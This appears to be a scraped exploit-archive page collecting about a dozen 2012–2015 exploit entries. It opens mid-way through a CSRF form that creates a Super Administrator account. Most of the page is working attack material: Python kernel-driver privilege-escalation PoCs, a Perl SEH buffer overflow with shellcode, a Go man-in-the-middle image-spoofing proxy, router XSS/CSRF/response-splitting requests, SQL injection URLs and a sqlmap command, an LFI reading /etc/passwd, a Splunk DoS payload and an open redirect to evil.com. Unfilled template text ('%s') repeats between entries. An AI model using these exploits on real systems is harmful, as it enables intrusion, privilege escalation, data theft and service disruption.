name="contact[first_name]" maxlength="50" id="og_1353469580_283914profileFormFirstName"> <label for="og_1353469580_283914profileFormSurName">Last name: <input type="text" value="poc2" name="contact[surname]" maxlength="50" id="og_1353469580_283914profileFormSurname"> <label for="og_1353469580_283914profileFormEmail">Email address:</label> <input type="text" value="poctest@live.com" name="contact[email]" style="width:260px;" maxlength="100" id="og_1353469580_283914profileFormEmail"> <div style="" class="user-data"> <label>Password:<input type="password" name="contact[user][password]"> <label>Repeat password:<input type="password" name="contact[user][password_a]" class="field-error"> <select name="contact[user][type]"> <option value="1">Super Administrator</option> <button tabindex="20000" id="og_1353471270_613002submit2" class="submit" type="submit" accesskey="s">Add Per<u>s</u>on</button>
HireHackking
KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation Title: SiS Windows VGA Display Manager Multiple Privilege Escalation Advisory ID: KL-001-2015-003 Publication Date: 2015.09.01 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt 1. Vulnerability Details Affected Vendor: Silicon Integrated Systems Corporation Affected Product: Windows VGA Display Manager Affected Version: 6.14.10.3930 Platform: Microsoft Windows 7 (x86), Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-5465 2. Vulnerability Description Vulnerabilities within the srvkp module allows an attacker to inject memory they control into an arbitrary location they define or cause memory corruption. IOCTL request codes 0x96002400 and 0x96002404 have been demonstrated to trigger these vulnerabilities. These vulnerabilities can be used to obtain control of code flow in a privileged process and ultimately be used to escalate the privilege of an attacker. 3. Technical Description Example against Windows XP: Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 ************************************************************************ ******* * * * Bugcheck Analysis * * * ************************************************************************ ******* Use !analyze -v to get detailed debugging information. BugCheck 50, {ffff0000, 1, 804f3b76, 0} Probably caused by : srvkp.sys ( srvkp+3329 ) Followup: MachineOwner --------- kd> kn Call stack: # ChildEBP RetAddr 00 f6a529a0 8051cc7f nt!KeBugCheckEx+0x1b 01 f6a52a00 805405d4 nt!MmAccessFault+0x8e7 02 f6a52a00 804f3b76 nt!KiTrap0E+0xcc 03 f6a52ad0 804fdaf1 nt!IopCompleteRequest+0x92 04 f6a52b20 806d3c35 nt!KiDeliverApc+0xb3 05 f6a52b20 806d3861 hal!HalpApcInterrupt+0xc5 06 f6a52ba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11 07 f6a52bc8 804f07e4 nt!KeInsertQueueApc+0x4b 08 f6a52bfc f7910329 nt!IopfCompleteRequest+0x1d8 09 f6a52c34 804ee129 srvkp+0x3329 0a f6a52c44 80574e56 nt!IopfCallDriver+0x31 0b f6a52c58 80575d11 nt!IopSynchronousServiceTail+0x70 0c f6a52d00 8056e57c nt!IopXxxControlFile+0x5e7 0d f6a52d34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0e f6a52d34 7c90e514 nt!KiFastCallEntry+0xf8 0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 15 0021f6c0 1e07bd9c _ctypes+0x54d8 16 00000000 00000000 python27!PyObject_Call+0x4c Example against Windows 7: Microsoft (R) Windows Debugger Version 6.2.9200.20512 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Windows\MEMORY.DMP] Kernel Summary Dump File: Only kernel address space is available Symbol search path is: *** Invalid *** ************************************************************************ **** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * ************************************************************************ **** Executable search path is: ******************************************************************* ** * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ******************************************************************* ** *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrpamp.exe - Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatib le Product: WinNt, suite: TerminalServer SingleUserTS Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850 Machine Name: Kernel base = 0x82a12000 PsLoadedModuleList = 0x82b5c850 Debug session time: Mon Aug 17 14:36:36.286 2015 (UTC - 7:00) System Uptime: 0 days 11:46:55.313 ******************************************************************* ** * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ******************************************************************* ** *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrpamp.exe - Loading Kernel Symbols ............................................................... ................................................................ ..................................... Loading User Symbols PEB is paged out (Peb.Ldr = 7ffd400c). Type ".hh dbgerr001" for details Loading unloaded module list .............................. ************************************************************************ ******* * * * Bugcheck Analysis * * * ************************************************************************ ******* Use !analyze -v to get detailed debugging information. BugCheck 8E, {c0000005, ac08f2fa, 93df4a50, 0} ***** Kernel symbols are WRONG. Please fix symbols to do analysis. ... ... ... Followup: MachineOwner --------- kd> .symfix;.reload Loading Kernel Symbols ............................................................... ................................................................ ..................................... Loading User Symbols PEB is paged out (Peb.Ldr = 7ffd400c). Type ".hh dbgerr001" for details Loading unloaded module list .............................. kd> !analyze -v ************************************************************************ ******* * * * Bugcheck Analysis * * * ************************************************************************ ******* KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: ac08f2fa, The address that the exception occurred at Arg3: 93df4a50, Trap Frame Arg4: 00000000 Debugging Details: ------------------ *** ERROR: Module load completed but symbols could not be loaded for srvkp.sys EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. FAULTING_IP: srvkp+32fa ac08f2fa 8b4804 mov ecx,dword ptr [eax+4] TRAP_FRAME: 93df4a50 -- (.trap 0xffffffff93df4a50) ErrCode = 00000000 eax=00000000 ebx=00000000 ecx=00000000 edx=93df4ae4 esi=85644140 edi=d68fc588 eip=ac08f2fa esp=93df4ac4 ebp=93df4afc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 srvkp+0x32fa: ac08f2fa 8b4804 mov ecx,dword ptr [eax+4] ds:0023:00000004=???????? Resetting default scope DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x8E PROCESS_NAME: python.exe CURRENT_IRQL: 0 LAST_CONTROL_TRANSFER: from 82ac708c to 82af0f20 STACK_TEXT: 93df45c4 82ac708c 0000008e c0000005 ac08f2fa nt!KeBugCheckEx+0x1e 93df49e0 82a50dd6 93df49fc 00000000 93df4a50 nt!KiDispatchException+0x1ac 93df4a48 82a50d8a 93df4afc ac08f2fa badb0d00 nt!CommonDispatchException+0x4a 93df4afc 82a49593 85644140 869fb048 869fb048 nt!KiExceptionExit+0x1 92 93df4b14 82c3d99f d68fc588 869fb048 869fb0b8 nt!IofCallDriver+0x63 93df4b34 82c40b71 85644140 d68fc588 00000000 nt!IopSynchronousServiceTail+0x1f8 93df4bd0 82c873f4 85644140 869fb048 00000000 nt!IopXxxControlFile+0x6aa 93df4c04 82a501ea 00000088 00000000 00000000 nt!NtDeviceIoControlFile+0x2a 93df4c04 77d270b4 00000088 00000000 00000000 nt!KiFastCallEntry+0x1 2a WARNING: Frame IP not in any known module. Following frames may be wrong. 0021f3dc 00000000 00000000 00000000 00000000 0x77d270b4 STACK_COMMAND: kb FOLLOWUP_IP: srvkp+32fa ac08f2fa 8b4804 mov ecx,dword ptr [eax+4] SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: srvkp+32fa FOLLOWUP_NAME: MachineOwner MODULE_NAME: srvkp IMAGE_NAME: srvkp.sys DEBUG_FLR_IMAGE_TIMESTAMP: 4cc65532 FAILURE_BUCKET_ID: 0x8E_srvkp+32fa BUCKET_ID: 0x8E_srvkp+32fa Followup: MachineOwner --------- 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2015.05.14 - Initial contact; requested security contact. 2015.05.18 - Second contact attempt. 2015.05.25 - Third contact attempt. 2015.07.02 - KoreLogic requests CVE from Mitre. 2015.07.10 - Mitre issues CVE-2015-5465. 2015.07.28 - 45 business days have elapsed since KoreLogic last attempted to contact SiS without a response. 2015.09.01 - Public disclosure. 7. Proof of Concept # Arbitrary Write (Windows XP) from sys import exit from ctypes import * NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory WriteProcessMemory = windll.kernel32.WriteProcessMemory DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None device = "siskp" code = 0x96002404 inlen = 0xe6b6 outlen = 0x0 inbuf = 0x1 outbuf = 0xffff0000 inBufMem = "\x90"*inlen def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x 1000|0x2000,0x40) WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0))) DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,o utbuf,outlen) CloseHandle(handle) return False if __name__=="__main__": main() and # Null Pointer Dereference (Windows XP/7) from sys import exit from ctypes import * DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None device = "siskp" code = 0x96002400 def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1) DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,0x0,0x0 ,0x0) CloseHandle(handle) return False if __name__=="__main__": main() The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli cy.v1.0.txt
HireHackking

Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities

HACKER · %s · %s

# Title: Edimax BR6228nS/BR6228nC - Multiple vulnerabilities # Date: 01.09.15 # Vendor: edimax.com # Firmware version: 1.22 # Author: Smash_ # Contact: smash [at] devilteam.pl Few vulnerabilities found in Edimax BR6228nS/BR6228nC router firmware. 1/ Cross Site Scripting Request: POST /goform/formWizSetup HTTP/1.1 Host: 192.168.0.10:8080 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.10:8080/main.asp Cookie: language=0 Authorization: Basic YWRtaW46MTIzNA== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 33 setPage=x");alert("X&wizEnabled=1 Response: HTTP/1.0 200 OK Server: GoAhead-Webs <html> <body class="background" onLoad=document.location.replace("x");alert("X")></html> 2/ HTTP Response Splitting Request: POST /goform/formReflashClientTbl HTTP/1.1 Host: 192.168.0.10:8080 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.10:8080/stadhcptbl.asp Cookie: language=0 Authorization: Basic YWRtaW46MTIzNA== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 163 submit-url=%2Fstadhcptbl.asp%0d%0aXXX%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert('X')</script> Response: HTTP/1.0 302 Redirect Server: GoAhead-Webs Date: Fri Nov 16 18:08:51 2012 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://192.168.0.10:8080/stadhcptbl.asp XXX Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html <script>alert('X')</script> 3/ Cross Site Request Forgery Examples: <html> <!-- Reboot --> <body> <form action="http://192.168.0.10:8080/goform/formReboot" method="POST"> <input type="hidden" name="reset&#95;flag" value="0" /> <input type="hidden" name="submit&#45;url" value="&#47;tools&#46;asp" /> <input type="submit" value="Go" /> </form> </body> </html> - <html> <!-- Enable remote access --> <body> <form action="http://192.168.0.10:8080/goform/formReManagementSetup" method="POST"> <input type="hidden" name="reManHostAddr" value="0&#46;0&#46;0&#46;0" /> <input type="hidden" name="reManPort" value="8080" /> <input type="hidden" name="reMangEnable" value="ON" /> <input type="hidden" name="submit&#45;url" value="&#47;system&#46;asp" /> <input type="hidden" name="" value="" /> <input type="submit" value="Go" /> </form> </body> </html> - <html> <!-- XSS --> <body> <form action="http://192.168.0.10:8080/goform/formWizSetup" method="POST"> <input type="hidden" name="setPage" value="x"&#41;&#59;alert&#40;"X" /> <input type="hidden" name="wizEnabled" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4/ Unprotected files Following url's can be requested without http authorisation in order to obtain detail informations about router: http://192.168.0.10:8080/FUNCTION_SCRIPT http://192.168.0.10:8080/main.asp Example: devil@hell:~$ curl -ig http://192.168.0.10:8080/ HTTP/1.1 401 Unauthorized Server: GoAhead-Webs Date: Fri Nov 16 18:28:39 2012 WWW-Authenticate: Basic realm="Default: admin/1234" Pragma: no-cache Cache-Control: no-cache Content-Type: text/html devil@hell:~$ curl -ig http://192.168.0.10:8080/FUNCTION_SCRIPT HTTP/1.0 200 OK Date: Fri Nov 16 18:28:47 2012 Server: GoAhead-Webs Last-modified: Fri Nov 16 09:57:30 2012 Content-length: 997 Content-type: text/html _DATE_="2012.11.16-17:51:47" _VERSION_="1.22" _MODEL_="BR6228GNS" _MODE_="EdimaxOBM" _PLATFORM_="RTL8196C_1200" _HW_LED_WPS_="4" _HW_LED_POWER_="6" _HW_LED_WIRELESS_="2" _HW_LED_USB_="17" _HW_BUTTON_RESET_="5" (...)
HireHackking

Twitter for iPhone - Man in the Middle Security

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56665/info Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack. Attackers can exploit this issue to capture and modify pictures that the user sees in the application. Twitter for iPhone 5.0 is vulnerable; other versions may also be affected. /* Twitter App, eavesdroping PoC Written by Carlos Reventlov <carlos@reventlov.com> License MIT */ package main import ( "fmt" "github.com/xiam/hyperfox/proxy" "github.com/xiam/hyperfox/tools/logger" "io" "log" "os" "path" "strconv" "strings" ) const imageFile = "spoof.jpg" func init() { _, err := os.Stat(imageFile) if err != nil { panic(err.Error()) } } func replaceAvatar(pr *proxy.ProxyRequest) error { stat, _ := os.Stat(imageFile) image, _ := os.Open(imageFile) host := pr.Response.Request.Host if strings.HasSuffix(host, "twimg.com") == true { if pr.Response.ContentLength != 0 { file := "saved" + proxy.PS + pr.FileName var ext string contentType := pr.Response.Header.Get("Content-Type") switch contentType { case "image/jpeg": ext = ".jpg" case "image/gif": ext = ".gif" case "image/png": ext = ".png" case "image/tiff": ext = ".tiff" } if ext != "" { fmt.Printf("** Saving image.\n") os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755)) fp, _ := os.Create(file) if fp == nil { fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file)) } io.Copy(fp, pr.Response.Body) fp.Close() pr.Response.Body.Close() } } fmt.Printf("** Sending bogus image.\n") pr.Response.ContentLength = stat.Size() pr.Response.Header.Set("Content-Type", "image/jpeg") pr.Response.Header.Set("Content-Length", strconv.Itoa(int(pr.Response.ContentLength))) pr.Response.Body = image } return nil } func main() { p := proxy.New() p.AddDirector(logger.Client(os.Stdout)) p.AddInterceptor(replaceAvatar) p.AddLogger(logger.Server(os.Stdout)) var err error err = p.Start() if err != nil { log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error())) } }
HireHackking

Beat Websites - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56683/info Beat Websites is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Beat Websites 1.0 is vulnerable; other versions may also be affected. http://www.example.com/page_detail.php?id=1 and 1=1 http://www.example.com/page_detail.php?id=1 and 1=2
HireHackking

Forescout CounterACT - 'a' Open Redirection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56687/info Forescout CounterACT is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. Forescout CounterACT 6.3.4.1 is vulnerable; other versions may also be affected. http://www.example.com/assets/login?a=http://www.evil.com
HireHackking

Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection

HACKER · %s · %s

# Exploit Title: Cyberoam : Blind SQL Injection # Date: 31/Aug/2015 # Exploit Author: Dharmendra Kumar Singh # Contact: dsingh63@outlook.com # Vendor Homepage: http://www.cyberoam.com # Software Link: http://www.cyberoam.com/NGFW/ # Version: CR500iNG-XP - 10.6.2 MR-1 # Category: Firewall 1. Description The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database. The username field is vulnerable to the following types of SQL Injections a) Boolean-based blind sql injection b) Stacked queries 2. Proof of Concept The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0" The query generated in backend server must be something like this SELECT password FROM table_name WHERE username = 'cyberuser' a) Boolean-based blind sql injection If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0" And sql query will become SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x' A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection b) Stacked queries if username is set to cyberuser';SELECT PG_SLEEP(5) -- the resultant sql query will become SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- ' The stacked sql query "SELECT PG_SLEEP(5)" will make the current session’s process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field. 3. Exploit Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0" 4. Solution The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched. 5. Conclusion The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data
HireHackking

Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow

HACKER · %s · %s

#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64 # Date: 8-31-2015 # Software Link: http://www.boxoft.com/wav-to-mp3/ # Exploit Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # Target: Windows 7 Enterprise x64 # CVE: # Category: Local Exploit # # Description: # A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file my $buff = "\x41" x 4132; #my $nseh = "\x42" x 4; #my $seh = "\x43" x 4; my $endofbuff = "\x41" x 5860; $nseh = "\xeb\x06\x90\x90"; # jump to shellcode $seh = pack('V',0x0040144c); # pop pop retn #MessageBox Shellc0de #https://www.exploit-db.com/exploits/28996/ my $shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42". "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03". "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b". "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e". "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c". "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74". "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe". "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; #$nops = "\x90" x 20; open(myfile,'>crash3r.wav'); print myfile $buff.$nseh.$seh.$shellcode.$endofbuff; close (myfile);
HireHackking

Splunk 4.3.1 - Denial of Service

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56581/info Splunk is prone to multiple cross-site scripting vulnerabilities and a denial-of-service vulnerability because it fails to properly handle user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. "--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0 \0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0"
HireHackking

ATutor 2.1 - 'tool_file' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56600/info ATutor is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. ATutor 2.1 is vulnerable; other versions may also be affected. http://www.example.com/ATutor-2.1/ATutor/mods/_core/tool_manager/index.php?h=1&tool_file=./../../../../../../../../../../etc/passwd
HireHackking

dotProject 2.1.x - 'index.php' Multiple SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56624/info Dotproject is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple cross-site scripting vulnerabilities Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dotproject versions prior to 2.1.7 are vulnerable. http://www.example.com/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202 http://www.example.com/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%2 0INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202 http://www.example.com/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202 http://www.example.com/?m=projects&update_project_status=1&project_status=1&project_id[]=%27%20UNION%20SELECT %20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202 http://www.example.com/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%2 0%27/tmp/file.txt%27%20--%202